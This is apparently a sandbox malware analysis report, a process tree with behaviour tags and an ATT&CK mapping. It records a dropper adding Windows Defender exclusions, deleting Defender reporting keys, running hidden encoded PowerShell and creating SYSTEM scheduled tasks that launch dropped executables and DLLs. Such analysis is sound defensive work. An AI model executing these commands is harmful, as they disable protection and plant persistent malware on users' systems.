                                                                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:3652
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5796
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:5736
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5808
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5800
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5832
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5436
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:372
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4864
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3124
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4948
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5820
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:5816
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5856
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5848
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5096
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:464
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3396
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:3648
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "gleTmtEMv" /SC once /ST 12:48:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:2452
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /run /I /tn "gleTmtEMv"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5928
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "gleTmtEMv"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:5356
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /CREATE /TN "jxYoSlBHWktfkOGzI" /SC once /ST 12:41:13 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exe\" s9 /site_id 690689 /S" /V1 /F
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /run /I /tn "jxYoSlBHWktfkOGzI"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:928
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:2528
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:5992
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                                                        • C:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exe
                                                                                                                                                                                                                                                                                          C:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exe s9 /site_id 690689 /S
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                          • Drops Chrome extension
                                                                                                                                                                                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                          PID:680
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "bIxjpVXoYOizHLMzgM"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4492
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:3340
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:4388
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:6072
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\aHEACJvKU\MYznPW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BjteDXltprXfzmY" /V1 /F
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:6120
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "BjteDXltprXfzmY2" /F /xml "C:\Program Files (x86)\aHEACJvKU\XZPywfJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:4704
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /END /TN "BjteDXltprXfzmY"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:5480
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "BjteDXltprXfzmY"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:2528
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "vPYIdGywxzqMlm" /F /xml "C:\Program Files (x86)\JGBawXrjoobU2\kFUMGCg.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:5520
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "lhICLSatieIgq2" /F /xml "C:\ProgramData\OWjgaygRnjJbmZVB\XenSpbs.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:3208
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "fOBKzYJEMGAKVrEmi2" /F /xml "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\EuAqbId.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:6012
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "HcaeqZNCscmyMkPxcyz2" /F /xml "C:\Program Files (x86)\FaGkFfZLSayRC\TTadgqL.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:560
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "HLqSMavzDSJMsouea" /SC once /ST 14:37:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EtAJcKWZAugUizrJ\ctnuKpcB\uMkUNjJ.dll\",#1 /site_id 690689" /V1 /F
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:4412
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "HLqSMavzDSJMsouea"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:3692
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:4524
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:3312
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1612
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:5084
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "jxYoSlBHWktfkOGzI"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:5280
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2624 -ip 2624
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:4512
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EtAJcKWZAugUizrJ\ctnuKpcB\uMkUNjJ.dll",#1 /site_id 690689
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:4648
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EtAJcKWZAugUizrJ\ctnuKpcB\uMkUNjJ.dll",#1 /site_id 690689
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                          PID:6060
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "HLqSMavzDSJMsouea"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:3944
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 2624
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:2828
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2624 -ip 2624
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:3720
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2624 -ip 2624
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:5212

                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                              Downloads

